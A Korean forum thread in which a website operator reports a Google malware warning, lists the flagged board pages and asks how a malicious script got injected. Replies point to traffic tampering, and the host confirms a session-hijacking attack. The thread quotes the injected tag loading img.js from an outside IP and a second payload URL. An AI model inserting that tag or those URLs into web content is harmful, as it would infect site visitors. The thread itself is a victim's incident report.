악성코드 문제입니다. 정보
악성코드 문제입니다.
본문
사이트 접속 시 파이어폭스나 구글에서 다음과 같은 메세지가 뜹니다.
=========================================
위험 평가 결과
위험 사이트 의심 대상에 포함된 사이트입니다. 이 사이트를 방문하면 컴퓨터 보안에 해로울 수 있습니다.
지난 90일 동안 사이트에서 의심되는 행위가 1회 보고되었습니다.
Google이 사이트를 방문했을 때의 결과
지 난 90일간 진행된 사이트 테스트에서 158개의 페이지 가운데 7개에서 사용자 동의 없이 악성 소프트웨어가 다운로드 및 설치된 것으로 확인되었습니다. Google이 사이트에 마지막으로 방문한 것은 2011-01-21이며, 의심되는 콘텐츠가 마지막으로 발견된 것은 2011-01-21입니다.
Malicious software includes 7 exploit(s), 5 scripting exploit(s).
173.244.192.0/, ncity.net/, fsm.ft.co.kr/을(를) 포함한 3개의 도메인에서 악성 소프트웨어를 호스팅하고 있습니다.
This site was hosted on 2 network(s) including AS9848 (GNGAS), AS9318 (HANARO).
이 사이트를 통해 감염된 사이트
지난 90일간 /bbs은(는) 다른 사이트에 악성코드를 유포하지 않았습니다.
악성 소프트웨어 유포
아니요. 이 사이트는 지난 90일간 악성 소프트웨어를 호스팅하지 않았습니다.
위험 평가 결과의 원인
합법적인 사이트에 제3자가 악성코드를 추가될 수 있으며 이때 경고 메시지가 표시됩니다.
==============================================================================
사이트 내에 악성코드가 있는건 아닌데 악성코드가 링크되어 있는 듯 합니다.
그리고 구글 웹마스터 도구의 악성코드에서는 다음과 같은 목록이 뜹니다.
/bbs/ - 상세정보 11. 1. 21.
/bbs/login_check.php - 상세정보 11. 1. 21.
/bbs/ - 상세정보 11. 1. 21.
/bbs/board.php?bo_table=recommend&wr_id=14838 - 상세정보 11. 1. 21.
/bbs/login_check.php - 상세정보 11. 1. 21.
/bbs/write_comment_update.php - 상세정보 11. 1. 21.
/bbs/memo2_form_update.php - 상세정보
<script src=http://173.244.192.245/img.js>
이 코드가 감염이 의심되는 코드라고 하는데 문자열 검색으로 해당 코드를 찾아봤지만 해당 코드는 발견 되지 않았습니다.
웹셀 검색 프로그램으로 웹셀 검색해보았지만 역시 아무런 결과가 없습니다.
백신프로그램인 아바스트로 검색시
ttp://67.21.76.27/rop/js.js
ttp://173.244.192.245/img.js
이 두개의 주소에서 HTML:IFrame-GN[Trj] 라는 트로이목마를 찾아냅니다.
위 정황상 웹셀로 소스파일을 수정한건 아닌거 같은데 그럼 도대체 어떻게 악성코드가 삽입 된 부분을 찾아 낼 수 있을까요?
=========================================
위험 평가 결과
위험 사이트 의심 대상에 포함된 사이트입니다. 이 사이트를 방문하면 컴퓨터 보안에 해로울 수 있습니다.
지난 90일 동안 사이트에서 의심되는 행위가 1회 보고되었습니다.
Google이 사이트를 방문했을 때의 결과
지 난 90일간 진행된 사이트 테스트에서 158개의 페이지 가운데 7개에서 사용자 동의 없이 악성 소프트웨어가 다운로드 및 설치된 것으로 확인되었습니다. Google이 사이트에 마지막으로 방문한 것은 2011-01-21이며, 의심되는 콘텐츠가 마지막으로 발견된 것은 2011-01-21입니다.
Malicious software includes 7 exploit(s), 5 scripting exploit(s).
173.244.192.0/, ncity.net/, fsm.ft.co.kr/을(를) 포함한 3개의 도메인에서 악성 소프트웨어를 호스팅하고 있습니다.
This site was hosted on 2 network(s) including AS9848 (GNGAS), AS9318 (HANARO).
이 사이트를 통해 감염된 사이트
지난 90일간 /bbs은(는) 다른 사이트에 악성코드를 유포하지 않았습니다.
악성 소프트웨어 유포
아니요. 이 사이트는 지난 90일간 악성 소프트웨어를 호스팅하지 않았습니다.
위험 평가 결과의 원인
합법적인 사이트에 제3자가 악성코드를 추가될 수 있으며 이때 경고 메시지가 표시됩니다.
==============================================================================
사이트 내에 악성코드가 있는건 아닌데 악성코드가 링크되어 있는 듯 합니다.
그리고 구글 웹마스터 도구의 악성코드에서는 다음과 같은 목록이 뜹니다.
/bbs/ - 상세정보 11. 1. 21.
/bbs/login_check.php - 상세정보 11. 1. 21.
/bbs/ - 상세정보 11. 1. 21.
/bbs/board.php?bo_table=recommend&wr_id=14838 - 상세정보 11. 1. 21.
/bbs/login_check.php - 상세정보 11. 1. 21.
/bbs/write_comment_update.php - 상세정보 11. 1. 21.
/bbs/memo2_form_update.php - 상세정보
<script src=http://173.244.192.245/img.js>
이 코드가 감염이 의심되는 코드라고 하는데 문자열 검색으로 해당 코드를 찾아봤지만 해당 코드는 발견 되지 않았습니다.
웹셀 검색 프로그램으로 웹셀 검색해보았지만 역시 아무런 결과가 없습니다.
백신프로그램인 아바스트로 검색시
ttp://67.21.76.27/rop/js.js
ttp://173.244.192.245/img.js
이 두개의 주소에서 HTML:IFrame-GN[Trj] 라는 트로이목마를 찾아냅니다.
위 정황상 웹셀로 소스파일을 수정한건 아닌거 같은데 그럼 도대체 어떻게 악성코드가 삽입 된 부분을 찾아 낼 수 있을까요?
댓글 전체
비슷한 경우를 보고 있는데요.
파일이 변조된 상태가 아니라면
웹 서버에서 뭔가 해? 주고 있는 거 같습니다.
파일이 변조된 상태가 아니라면
웹 서버에서 뭔가 해? 주고 있는 거 같습니다.
해당 호스팅사 문의 하셔서
증상을 말씀하세요.
제 경우는 다른 해킹된 서버가, 제 서버 네트웍 통신 내용을 변조했다고 하네요. 정확한 표현은 아닙니다만.....
증상을 말씀하세요.
제 경우는 다른 해킹된 서버가, 제 서버 네트웍 통신 내용을 변조했다고 하네요. 정확한 표현은 아닙니다만.....
어제 문의 했을 때는 whistl 한번 돌려보고 문제 없다고만 하더니 이런저런 확인 자료를 보여 주니 답변을 주네요.
==========================
해당 공격은 프로토콜 취약점을 이용한 세션 하이재킹 공격으로 고객님께서 유추하신 부분이 맞습니다.
현재 해킹이 이루어진 고객사를 대부분 확인하여 수정조치에 있으며 현재 공격은 중단된 상태입니다.
==========================
저말고도 피해 입은 곳이 많은 모양입니다.
==========================
해당 공격은 프로토콜 취약점을 이용한 세션 하이재킹 공격으로 고객님께서 유추하신 부분이 맞습니다.
현재 해킹이 이루어진 고객사를 대부분 확인하여 수정조치에 있으며 현재 공격은 중단된 상태입니다.
==========================
저말고도 피해 입은 곳이 많은 모양입니다.